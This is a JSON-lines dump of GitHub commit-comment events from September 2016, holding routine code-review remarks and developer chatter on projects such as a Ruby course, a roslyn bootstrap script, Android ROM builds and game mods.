{"id":"4505610137","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/ror-basics-course"},"payload":{"comment":{"id":18872039,"position":44,"line":44,"path":"Lesson_7/views/views.rb","commit_id":"412c30516e9bdd8011275585962badb7f6a04765","created_at":"2016-09-01T22:54:14Z","updated_at":"2016-09-01T22:54:14Z","body":"Всё это это лучше вынести отсюда. В идеале, между моделью `Train` и интерфейсом должен быть ещё `TrainPresenter`, который как раз и отвечает за формат вывода данных. Впрочем, не будем усложнять сейчас."}},"created_at":"2016-09-01T22:54:14Z"}
{"id":"4505614290","type":"CommitCommentEvent","actor":{"login":"travel8050"},"repo":{"name":"travel8050/dissertation"},"payload":{"comment":{"id":18872048,"position":null,"line":null,"path":null,"commit_id":"0c5567ebf3ddf795edf35d8b212c8d4d9419e3f2","created_at":"2016-09-01T22:55:23Z","updated_at":"2016-09-01T22:55:23Z","body":"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n[high noise with BB.zip](https://github.com/travel8050/dissertation/files/450867/high.noise.with.BB.zip)\r\n[high noise.zip](https://github.com/travel8050/dissertation/files/450869/high.noise.zip)\r\n[low noise.zip](https://github.com/travel8050/dissertation/files/450868/low.noise.zip)\r\n"}},"created_at":"2016-09-01T22:55:23Z"}
{"id":"4505616605","type":"CommitCommentEvent","actor":{"login":"travel8050"},"repo":{"name":"travel8050/dissertation"},"payload":{"comment":{"id":18872060,"position":null,"line":null,"path":null,"commit_id":"0c5567ebf3ddf795edf35d8b212c8d4d9419e3f2","created_at":"2016-09-01T22:56:00Z","updated_at":"2016-09-01T22:56:00Z","body":"the file contains the raw data obtained from the particapnts under the different conditions of noise"}},"created_at":"2016-09-01T22:56:00Z"}
{"id":"4505621277","type":"CommitCommentEvent","actor":{"login":"Thutmose"},"repo":{"name":"Thutmose/Pokecube"},"payload":{"comment":{"id":18872070,"position":null,"line":null,"path":null,"commit_id":"af27b26a0a82383b6198d879afd9e89a11252f85","created_at":"2016-09-01T22:57:16Z","updated_at":"2016-09-01T22:57:16Z","body":"Full changelog:\r\n\r\nMake idle AI check that path length is not too long, and if is, not\r\npath.  This prevents pokemobs pathing really long ways to go around\r\nwalls, instead of staying near owner.\r\n\r\nFixes some issues with saving data on single player, fixes getting choose first gui every time logging in.\r\n\r\nConsolidates some more packets.\r\n\r\nFixes earthquake and magnitude ignoring FF config and always hurting owner if allowed to hurt players.\r\n\r\nFixes some issues with location of options for teleport gui.\r\n\r\nFixes previous page button in pokedex not working as intended"}},"created_at":"2016-09-01T22:57:16Z"}
{"id":"4505622411","type":"CommitCommentEvent","actor":{"login":"mucro9"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18872072,"position":null,"line":null,"path":null,"commit_id":"cace722f9930ba0e70d99adec653329f39f7dbc2","created_at":"2016-09-01T22:57:35Z","updated_at":"2016-09-01T22:57:35Z","body":"https://github.com/NoxxDev/NecroBot/issues/764 check this"}},"created_at":"2016-09-01T22:57:35Z"}
{"id":"4505622529","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872073,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T22:57:37Z","updated_at":"2016-09-01T22:57:37Z","body":"You should already be able to successfully compile a working cm 14 version, pick my changes + the temp fixes made by Zhao on cm gerrit and should work... Oh another thing, the cdma not working issue is related to the build environment here, I messed something  for sure when I merged the code so now the trick that we use in mm for copy the proprietary blobs does not work any more, but should work fine on cm... I think I will take a look next days, in every case cdma issue is related to our unified device tree, change will work on all variants in stock cm"}},"created_at":"2016-09-01T22:57:37Z"}
{"id":"4505629322","type":"CommitCommentEvent","actor":{"login":"pliu007"},"repo":{"name":"huangzehao/SCN_Matlab"},"payload":{"comment":{"id":18872097,"position":null,"line":null,"path":null,"commit_id":"e232ccec20facd4c3bf2baccfe993dceca251c55","created_at":"2016-09-01T22:59:29Z","updated_at":"2016-09-01T22:59:29Z","body":"Is  the attached code correct ?\n\n\n\n\n\nOn Thu, Sep 1, 2016 at 4:13 AM, Maxsky <notifications@github.com> wrote:\n\n> Hi, you can check the implementation code of SRCNN. Use for loop and conv2\n> to implement convolution.\n>\n> 在 2016年9月1日，15:19，Peng Liu <notifications@github.com<mailto:\n> notifications@github.com>> 写道：\n>\n> Hi,\n>\n> I am thinking if we can use matlab code only to test instead of\n> MatconvNet.\n>\n> The attached file is my code. but it seems not working.\n>\n> could you check for me?\n>\n> On Wed, Aug 31, 2016 at 4:22 AM, Maxsky <notifications@github.com<mailto:\n> notifications@github.com>> wrote:\n>\n> > Hi, check the new update of caffe-vdsr.\n> >\n> > ―\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/huangzehao/SCN_Matlab/commit/\n> e232ccec20facd4c3bf2baccfe993dceca251c55#commitcomment-18842873>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AIZJ5TjvyWQukl5-\n> o4PDNz5aB9ybeHYGks5qlTm-gaJpZM4JxO8i>\n> > .\n> >\n>\n> ―\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub<https://github.com/\n> huangzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993d\n> ceca251c55#commitcomment-18859116>, or mute the thread<https://github.com/\n> notifications/unsubscribe-auth/ANB22m_tF_mMwv1nUVXav4A-\n> k4IJi6axks5qlnx4gaJpZM4JxO8i>.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/huangzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993dceca251c55#commitcomment-18859750>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIZJ5SYtLxnIImHys9X7ERzZe3eGFqlrks5qloktgaJpZM4JxO8i>\n> .\n>\n"}},"created_at":"2016-09-01T22:59:29Z"}
{"id":"4505633207","type":"CommitCommentEvent","actor":{"login":"ornicar"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":18872113,"position":null,"line":null,"path":null,"commit_id":"29f6f1e12b301a7f450043a568a0418551b42b14","created_at":"2016-09-01T23:00:29Z","updated_at":"2016-09-01T23:00:29Z","body":"I'm increasing by 2 every day, and keeping an eye on the monitoring. There's no rush."}},"created_at":"2016-09-01T23:00:29Z"}
{"id":"4505637614","type":"CommitCommentEvent","actor":{"login":"ornicar"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":18872126,"position":null,"line":null,"path":null,"commit_id":"29f6f1e12b301a7f450043a568a0418551b42b14","created_at":"2016-09-01T23:01:40Z","updated_at":"2016-09-01T23:01:40Z","body":"![](https://i.imgur.com/bJOUR7p.png)"}},"created_at":"2016-09-01T23:01:40Z"}
{"id":"4505638268","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/ror-basics-course"},"payload":{"comment":{"id":18872131,"position":12,"line":12,"path":"Lesson_7/controllers/trains_on_station_list_controller.rb","commit_id":"412c30516e9bdd8011275585962badb7f6a04765","created_at":"2016-09-01T23:01:49Z","updated_at":"2016-09-01T23:01:49Z","body":"Меня просто смутило что мы сейчас уже на экране вывода списка поездов для выбранной станции. И если такая станция есть и на ней есть поезда, `@@screen = :trains_on_station_list` вроде бы этот же экран?"}},"created_at":"2016-09-01T23:01:49Z"}
{"id":"4505638949","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18872135,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T23:02:00Z","updated_at":"2016-09-01T23:02:00Z","body":"Yes I took a look at your lua and incorporated all your intention that you used (AI will know how to use it in DLL). \r\n\r\nI also incorporated many things that you used like assigning nearby promotions without having to do lua calls. "}},"created_at":"2016-09-01T23:02:00Z"}
{"id":"4505639867","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/ror-basics-course"},"payload":{"comment":{"id":18872137,"position":8,"line":8,"path":"Lesson_7/controllers/trains_on_station_list_controller.rb","commit_id":"412c30516e9bdd8011275585962badb7f6a04765","created_at":"2016-09-01T23:02:14Z","updated_at":"2016-09-01T23:02:14Z","body":"Можно так:\r\n\r\n```ruby\r\nif station = stations[@@user_input]\r\nelse\r\nend\r\n```"}},"created_at":"2016-09-01T23:02:14Z"}
{"id":"4505640959","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18872138,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T23:02:33Z","updated_at":"2016-09-01T23:02:33Z","body":"That you use*"}},"created_at":"2016-09-01T23:02:33Z"}
{"id":"4505642471","type":"CommitCommentEvent","actor":{"login":"rakeshr1"},"repo":{"name":"Stanford-Mobisocial-IoT-Lab/sempre"},"payload":{"comment":{"id":18872144,"position":null,"line":null,"path":null,"commit_id":"215a71347d4bf64a1f3080f98f4f788559ca5e1b","created_at":"2016-09-01T23:02:56Z","updated_at":"2016-09-01T23:02:56Z","body":"Moved in later versions (???)"}},"created_at":"2016-09-01T23:02:56Z"}
{"id":"4505644569","type":"CommitCommentEvent","actor":{"login":"legacymgo"},"repo":{"name":"legacymgo/legacymgo.github.io"},"payload":{"comment":{"id":18872151,"position":24,"line":38,"path":"index.html","commit_id":"932bc13e82bbe6302688c1de7611f2afe984711b","created_at":"2016-09-01T23:03:29Z","updated_at":"2016-09-01T23:03:29Z","body":"too dank for mem\r\n"}},"created_at":"2016-09-01T23:03:29Z"}
{"id":"4505645255","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872154,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:03:42Z","updated_at":"2016-09-01T23:03:42Z","body":"well...my problem is greater than \"missing repos\"...\r\nI just dont know how to merge android N's changes to my already edited repos of optcm13....i dont know if i ever manage to build optcm14"}},"created_at":"2016-09-01T23:03:42Z"}
{"id":"4505648193","type":"CommitCommentEvent","actor":{"login":"smushovic"},"repo":{"name":"ReturnPath/EO_Analytics_Projects"},"payload":{"comment":{"id":18872160,"position":45,"line":150,"path":"Cert_Prospecting_Tool/Prospecting_Handoff_AScomments.R","commit_id":"986841768bfda5452228cc5146d949f6e1490fc7","created_at":"2016-09-01T23:04:32Z","updated_at":"2016-09-01T23:04:32Z","body":"Ah, of course. I used to merge the oracle and hive data differently, so before I needed that line to filter for oracle data. Your're right- it's not necessary anymore."}},"created_at":"2016-09-01T23:04:32Z"}
{"id":"4505649214","type":"CommitCommentEvent","actor":{"login":"Matt07211"},"repo":{"name":"Matt07211/xcover3ltexx_custom_kernel"},"payload":{"comment":{"id":18872163,"position":null,"line":null,"path":null,"commit_id":"e2b33efe919b223acc3200f7cbbdd639da6e7301","created_at":"2016-09-01T23:04:50Z","updated_at":"2016-09-01T23:04:50Z","body":"@VolterPL Well I will leave the choice up to you, we can either keep it as it is now or revert back a commit."}},"created_at":"2016-09-01T23:04:50Z"}
{"id":"4505660892","type":"CommitCommentEvent","actor":{"login":"Matt07211"},"repo":{"name":"Matt07211/xcover3ltexx_custom_kernel"},"payload":{"comment":{"id":18872190,"position":null,"line":null,"path":null,"commit_id":"cadf4bb10e5a8a05d8627e4ecc37543a5db00c8c","created_at":"2016-09-01T23:08:07Z","updated_at":"2016-09-01T23:08:07Z","body":"Cool, thanks for the info, will modify my local copy. Glad you did the research into it, its a bit hard for me to do it reliably on a mobile."}},"created_at":"2016-09-01T23:08:07Z"}
{"id":"4505661568","type":"CommitCommentEvent","actor":{"login":"smushovic"},"repo":{"name":"ReturnPath/EO_Analytics_Projects"},"payload":{"comment":{"id":18872191,"position":26,"line":133,"path":"Cert_Prospecting_Tool/Prospecting_Handoff_AScomments.R","commit_id":"986841768bfda5452228cc5146d949f6e1490fc7","created_at":"2016-09-01T23:08:17Z","updated_at":"2016-09-01T23:08:17Z","body":"Yeah, what I should have done was clear my environment. I ran through the code piece by piece, but if I had run it all the way through I would have caught the missing library as well as the typos and naming errors. \r\nAnd good point about the hard coding- I'll have to break that habit. "}},"created_at":"2016-09-01T23:08:17Z"}
{"id":"4505663375","type":"CommitCommentEvent","actor":{"login":"jasonmit"},"repo":{"name":"jasonmit/ember.js"},"payload":{"comment":{"id":18872194,"position":6,"line":40,"path":"packages/ember-runtime/tests/ext/rsvp_test.js","commit_id":"54d16657ef617e9c3e29e14a1b06e0fa3501a686","created_at":"2016-09-01T23:08:48Z","updated_at":"2016-09-01T23:08:48Z","body":"Force off so that it takes the buggy path"}},"created_at":"2016-09-01T23:08:48Z"}
{"id":"4505665717","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18872204,"position":null,"line":null,"path":null,"commit_id":"1ba5666802827672acb744ce2354d4abc8095aa3","created_at":"2016-09-01T23:09:28Z","updated_at":"2016-09-01T23:09:28Z","body":"ayy"}},"created_at":"2016-09-01T23:09:28Z"}
{"id":"4505666463","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872209,"position":12,"line":12,"path":"dotnetexec.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:09:42Z","updated_at":"2016-09-01T23:09:42Z","body":"I'm not sure I like having to go through a dotnetexec ps1 script to run dotnet, as that will not work well for the many tools that we need to run. Instead it would be better if we could simply setup a path to the right dotnet.exe and then folks can just call that. "}},"created_at":"2016-09-01T23:09:42Z"}
{"id":"4505669858","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872216,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:10:44Z","updated_at":"2016-09-01T23:10:44Z","body":"You must start from AOSP clean repos like cm guys are doing, or fork their repos when you need to change something... For sure\r\nbuild, framework/opt/telephony and packages/apps/CarrierConfig for unified device tree support, and use cm-14.0 staging (i think) manifest"}},"created_at":"2016-09-01T23:10:44Z"}
{"id":"4505674096","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872230,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:11:59Z","updated_at":"2016-09-01T23:11:59Z","body":"trying to fork the repos from CM,doesnt let me to fork them to JDCTeam github ..it considers there are already some repos called the same ...\r\n"}},"created_at":"2016-09-01T23:11:59Z"}
{"id":"4505674368","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872232,"position":8,"line":8,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:12:05Z","updated_at":"2016-09-01T23:12:05Z","body":"This semaphore isn't going to be good enough. We are most likely going to need to always parse the cli and tools versions and check to see if the right version matches. Ideally via some file exists check. I can imagine this working by writing the version into a file similar to what we do today in corefx but we need to generalize it for all the tools not just the BuildTools package. "}},"created_at":"2016-09-01T23:12:05Z"}
{"id":"4505675012","type":"CommitCommentEvent","actor":{"login":"vinpez"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18872236,"position":7,"line":29,"path":"app/components/device.ts","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T23:12:18Z","updated_at":"2016-09-01T23:12:18Z","body":"changed to get deviceType() and removed the () from the html. Not sure how to move it to models/device"}},"created_at":"2016-09-01T23:12:18Z"}
{"id":"4505675493","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872237,"position":10,"line":10,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:12:26Z","updated_at":"2016-09-01T23:12:26Z","body":"nit: I would just exit early instead of indenting every line in this file. "}},"created_at":"2016-09-01T23:12:26Z"}
{"id":"4505677629","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872242,"position":40,"line":40,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:13:03Z","updated_at":"2016-09-01T23:13:03Z","body":"This looks good but do we know how difficult this will be to parse in a sh script?"}},"created_at":"2016-09-01T23:13:03Z"}
{"id":"4505679443","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872246,"position":43,"line":43,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:13:34Z","updated_at":"2016-09-01T23:13:34Z","body":"We are going to need to parameterize `netoreapp1.01`. "}},"created_at":"2016-09-01T23:13:34Z"}
{"id":"4505679615","type":"CommitCommentEvent","actor":{"login":"belozyorcev"},"repo":{"name":"bem/bem-components"},"payload":{"comment":{"id":18872247,"position":46,"line":35,"path":"design/common.blocks/spin/_theme/spin_theme_islands.post.css","commit_id":"e3a60a8c4e5414ec1f5b48ff99e1718e2fe05149","created_at":"2016-09-01T23:13:37Z","updated_at":"2016-09-01T23:13:37Z","body":"I don't know how to rewrite `bgShigt` it better."}},"created_at":"2016-09-01T23:13:37Z"}
{"id":"4505681270","type":"CommitCommentEvent","actor":{"login":"jedesah"},"repo":{"name":"quasar-analytics/quasar"},"payload":{"comment":{"id":18872249,"position":4,"line":59,"path":"marklogic/src/main/scala/quasar/physical/marklogic/ejson/AsXQuery.scala","commit_id":"8039f5c9c022c7ccc190300eabe05b51d978c1b8","created_at":"2016-09-01T23:14:09Z","updated_at":"2016-09-01T23:14:09Z","body":"Nice catch on the `case Char(c)`!"}},"created_at":"2016-09-01T23:14:09Z"}
{"id":"4505681888","type":"CommitCommentEvent","actor":{"login":"DenisseReyes"},"repo":{"name":"DenisseReyes/clase-sistop-2017-01"},"payload":{"comment":{"id":18872250,"position":null,"line":null,"path":null,"commit_id":"5573a14507b7c54b1106812d8f6d4bdd222ce3ce","created_at":"2016-09-01T23:14:18Z","updated_at":"2016-09-01T23:14:18Z","body":"DenisseReyes"}},"created_at":"2016-09-01T23:14:18Z"}
{"id":"4505682619","type":"CommitCommentEvent","actor":{"login":"antonybudianto"},"repo":{"name":"antonybudianto/angular2-starter"},"payload":{"comment":{"id":18872253,"position":8,"line":67,"path":"src/systemjs.conf.js","commit_id":"5d0f1f25dde9ebb7121d97fe28af6e3a63f1f060","created_at":"2016-09-01T23:14:31Z","updated_at":"2016-09-01T23:14:31Z","body":"ah, thanks for the catch!"}},"created_at":"2016-09-01T23:14:31Z"}
{"id":"4505684147","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872257,"position":63,"line":63,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:14:56Z","updated_at":"2016-09-01T23:14:56Z","body":"As you called out this structure might not hold for all packages. We can probably use this as a default and add some logic to call a script to allow it to initialize the package."}},"created_at":"2016-09-01T23:14:56Z"}
{"id":"4505684731","type":"CommitCommentEvent","actor":{"login":"jedesah"},"repo":{"name":"quasar-analytics/quasar"},"payload":{"comment":{"id":18872259,"position":5,"line":60,"path":"marklogic/src/main/scala/quasar/physical/marklogic/ejson/AsXQuery.scala","commit_id":"8039f5c9c022c7ccc190300eabe05b51d978c1b8","created_at":"2016-09-01T23:15:08Z","updated_at":"2016-09-01T23:15:08Z","body":"How was this compiling before? Was there an implicit conversion from `BigInt` to `String`?"}},"created_at":"2016-09-01T23:15:08Z"}
{"id":"4505686681","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872260,"position":64,"line":64,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:15:40Z","updated_at":"2016-09-01T23:15:40Z","body":"As part of installing the tools I would write a file `$destination\\$name\\$version.sempahore` so we can use that to check if the tool is updated. "}},"created_at":"2016-09-01T23:15:40Z"}
{"id":"4505686719","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872261,"position":8,"line":8,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:15:41Z","updated_at":"2016-09-01T23:15:41Z","body":"What if we use Chris' idea to diff the .cliversion and .toolversions files to see if there's a discrepancy?  E.g. once the tools have been restored we copy .toolversions to bootstrap.complete, and on subsequent runs we diff the two files instead of checking for its existence."}},"created_at":"2016-09-01T23:15:41Z"}
{"id":"4505689415","type":"CommitCommentEvent","actor":{"login":"smushovic"},"repo":{"name":"ReturnPath/EO_Analytics_Projects"},"payload":{"comment":{"id":18872266,"position":132,"line":293,"path":"Cert_Prospecting_Tool/Prospecting_Handoff_AScomments.R","commit_id":"986841768bfda5452228cc5146d949f6e1490fc7","created_at":"2016-09-01T23:16:26Z","updated_at":"2016-09-01T23:16:26Z","body":"I was filtering step by step because I wanted to see how much the list would shrink with each filter. In this section I was exploring a way to give good IPs extra points in the group ranking to follow. I ended up just taking the average ip score and feeding that into the group score function because it seemed to be simpler. But I wanted to see what everyone thought about the idea- since the ip score is sometimes questionable, I thought manually giving points for these attributes that we like could be an additional indicator "}},"created_at":"2016-09-01T23:16:26Z"}
{"id":"4505689750","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872268,"position":28,"line":28,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:16:32Z","updated_at":"2016-09-01T23:16:32Z","body":"I don't think I've ever see this. Would it be clearer to actually put the command call in the if block, assuming that works. "}},"created_at":"2016-09-01T23:16:32Z"}
{"id":"4505690326","type":"CommitCommentEvent","actor":{"login":"llopv"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":18872272,"position":5,"line":30,"path":"test/e2e/pages/invite.js","commit_id":"246ffeb4214cd2a8d31fcd0d0b5302203ff7c20b","created_at":"2016-09-01T23:16:42Z","updated_at":"2016-09-01T23:16:42Z","body":"Just tried. It is not working either."}},"created_at":"2016-09-01T23:16:42Z"}
{"id":"4505692500","type":"CommitCommentEvent","actor":{"login":"vfuyong"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18872278,"position":null,"line":null,"path":null,"commit_id":"cace722f9930ba0e70d99adec653329f39f7dbc2","created_at":"2016-09-01T23:17:21Z","updated_at":"2016-09-01T23:17:21Z","body":"I think the three delays are too long. I suggest \r\nTransferActionDelay = 5000\r\nRecycleActionDelay = 2500\r\nRenamePokemonActionDelay = 5000"}},"created_at":"2016-09-01T23:17:21Z"}
{"id":"4505692997","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872280,"position":1,"line":1,"path":"init-cli.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:17:31Z","updated_at":"2016-09-01T23:17:31Z","body":"If you haven't already we should use the same script you can download from the cli repo itself for initialize the cli. "}},"created_at":"2016-09-01T23:17:31Z"}
{"id":"4505695131","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872287,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:18:13Z","updated_at":"2016-09-01T23:18:13Z","body":"If we already have them then just checkout the new branches on the already existing repos and add the new repo/branch to our custom manifest\r\ngit checkout -b opt-cm-14.0 cm_remote_name\r\nthen for pushing the new branch\r\ngit push -u our_remote_name opt-cm-14.0"}},"created_at":"2016-09-01T23:18:13Z"}
{"id":"4505695592","type":"CommitCommentEvent","actor":{"login":"brocef"},"repo":{"name":"TuftsTusk/ringmaster"},"payload":{"comment":{"id":18872288,"position":null,"line":null,"path":null,"commit_id":"6eb70aec4306f5b82bd2dbb9a2133bf2096938b4","created_at":"2016-09-01T23:18:19Z","updated_at":"2016-09-01T23:18:19Z","body":"Welp, I'm rewriting all of this for my route-refactor. Hopefully the merge isn't too bad."}},"created_at":"2016-09-01T23:18:19Z"}
{"id":"4505696574","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872290,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-01T23:18:36Z","updated_at":"2016-09-01T23:18:36Z","body":"This commit failed to compile\r\nhttps://travis-ci.org/TwistedScorpio/OTHire/builds/156956307 =("}},"created_at":"2016-09-01T23:18:36Z"}
{"id":"4505696576","type":"CommitCommentEvent","actor":{"login":"vinpez"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18872291,"position":20,"line":20,"path":"app/models/devices/philips_hue_light.ts","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T23:18:36Z","updated_at":"2016-09-01T23:18:36Z","body":"I did both. There's really no good name for it that I can think of, but I changed it to PhilipsHueDeviceData"}},"created_at":"2016-09-01T23:18:36Z"}
{"id":"4505700282","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":18872299,"position":null,"line":null,"path":null,"commit_id":"e6b47ef6554f7c161a8b0a2359167260e2d4b4dc","created_at":"2016-09-01T23:19:44Z","updated_at":"2016-09-01T23:19:44Z","body":"Monolithic vs Isomorphic"}},"created_at":"2016-09-01T23:19:44Z"}
{"id":"4505701213","type":"CommitCommentEvent","actor":{"login":"vinpez"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18872303,"position":67,"line":99,"path":"app/pages/devices/add_edit_device.ts","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T23:20:01Z","updated_at":"2016-09-01T23:20:01Z","body":"Yes, I'll clean it up as we go. It's partially componentized now, but can definitely be cleaner. The overlap will become more apparent as we add more devices."}},"created_at":"2016-09-01T23:20:01Z"}
{"id":"4505702575","type":"CommitCommentEvent","actor":{"login":"rakeshr1"},"repo":{"name":"Stanford-Mobisocial-IoT-Lab/sempre"},"payload":{"comment":{"id":18872307,"position":null,"line":null,"path":null,"commit_id":"bd7e3b8879e587d7d83ec75e997fa61691d1c05f","created_at":"2016-09-01T23:20:18Z","updated_at":"2016-09-01T23:20:18Z","body":"Is this needed anymore?"}},"created_at":"2016-09-01T23:20:18Z"}
{"id":"4505703517","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872310,"position":28,"line":28,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:20:35Z","updated_at":"2016-09-01T23:20:35Z","body":"This is called the \"dollar-sign hook\" and it holds a boolean value indicating if the last command that was run succeeded or failed (I just learned about it yesterday).  Ideally what I would like is to capture the return value from the script and if it's non-zero return the actual value but I didn't find a way to do that."}},"created_at":"2016-09-01T23:20:35Z"}
{"id":"4505704935","type":"CommitCommentEvent","actor":{"login":"bobzhang"},"repo":{"name":"bloomberg/bucklescript"},"payload":{"comment":{"id":18872317,"position":null,"line":null,"path":null,"commit_id":"66b9bb60fddeee411538fe7c1fbdac4b6da3f9af","created_at":"2016-09-01T23:21:01Z","updated_at":"2016-09-01T23:21:01Z","body":"Thanks!"}},"created_at":"2016-09-01T23:21:01Z"}
{"id":"4505705240","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18872318,"position":null,"line":null,"path":null,"commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T23:21:08Z","updated_at":"2016-09-01T23:21:08Z","body":"@universam1: Sent you a message on the other issue. Also, I have a patch for SoftSerial. This is starting to get reeeally nice.\r\n\r\nAlso, I invited you to Gitter, this should make discussing easier."}},"created_at":"2016-09-01T23:21:08Z"}
